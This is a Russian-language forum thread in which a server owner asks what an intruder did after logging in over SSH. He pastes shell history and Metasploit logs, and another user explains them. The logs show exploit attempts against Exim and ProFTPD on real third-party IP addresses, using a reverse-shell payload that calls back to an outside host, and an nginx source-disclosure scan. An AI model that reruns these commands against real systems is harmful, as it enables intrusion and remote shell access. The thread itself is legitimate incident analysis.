Эх, ,мужики, кто-то вчера подключился ко мне по SSH, выполнив команды на установку Metasploit Framework, ну и заюзал его потом: cd /opt ls wget chrome://downloads/home/artur/Downloads/framework-3.5.1-mini-linux-i686.run wget http://updates.metasploit.com/data/releases/framework-3.5.1-mini-linux-i686.run yum install ruby rubygems ls chmod +x framework-3.5.1-mini-linux-i686.run ./framework-3.5.1-mini-linux-i686.run /opt/framework-3.5.1/msf3/msfconsole mc where where locate search top Это ппц теперь? Пароль на SSH оперативно поменял.
Из лога: /root/.msf3/logs/framework.log [01/27/2011 10:58:22] [e(0)] core: Exploit exception (unix/smtp/exim4_string_format): Rex::ConnectionRefused: The connection was refused by the remote host (83.69.226.125:25). [01/27/2011 10:58:49] [e(0)] core: Exploit exception (unix/smtp/exim4_string_format): RuntimeError: Warning: This version of Exim is not exploitable [01/27/2011 10:59:57] [e(0)] core: Exploit failed (linux/ftp/proftp_telnet_iac): The following options failed to validate: LHOST. [01/27/2011 11:00:11] [i(0)] core: generic/shell_reverse_tcp: iteration 1: Successfully encoded with encoder x86/shikata_ga_nai (size is 179) [01/27/2011 11:00:12] [e(0)] core: Exploit exception (linux/ftp/proftp_telnet_iac): RuntimeError: No matching target [01/27/2011 11:00:38] [i(0)] core: generic/shell_reverse_tcp: iteration 1: Successfully encoded with encoder x86/shikata_ga_nai (size is 179) [01/27/2011 11:00:38] [e(0)] core: Exploit exception (linux/ftp/proftp_telnet_iac): RuntimeError: No matching target
И еще: /root/.msf3/history use exploit/unix/smtp/exim4_string_format show payloads set PAYLOAD generic/shell_reverse_tcp set LHOST=178.250.241.13 set LHOST 178.250.241.13 set RHOST 83.69.226.125 exploit set RHOST 95.211.75.229 exploit use exploit/linux/ftp/proftp_telnet_iac set PAYLOAD generic/shell_reverse_tcp set LHOST=178.250.241.13 set RHOST 83.69.226.125 exploit set LHOST 178.250.241.13 exploit set RHOST 95.211.75.229 exploit use auxiliary/scanner/http/nginx_source_disclosure set RHOST 95.211.75.229 exploit set RHOSTS 95.211.75.229 set PATH_SAVE TTT exploit
neofit, привет! Пароли все поменял. Фраймворк деинсталлировал. А вообще что эта хрень сделала, если судить по логам?
use exploit/unix/smtp/exim4_string_format show payloads set PAYLOAD generic/shell_reverse_tcp set LHOST=178.250.241.13 set LHOST 178.250.241.13 set RHOST 83.69.226.125 exploit Пытались заюзать эксплоит для exim4 на машине 83.69.226.125, зарядив его реверсшеллом с бэкконнектом к твоему серверу. + пробавли ещё сплоит proftp_telnet_iac и не только на 83.69.226.125 но и на 95.211.75.229 Т.е. по сути сервак использовали как платсдарм для взлома других серверов.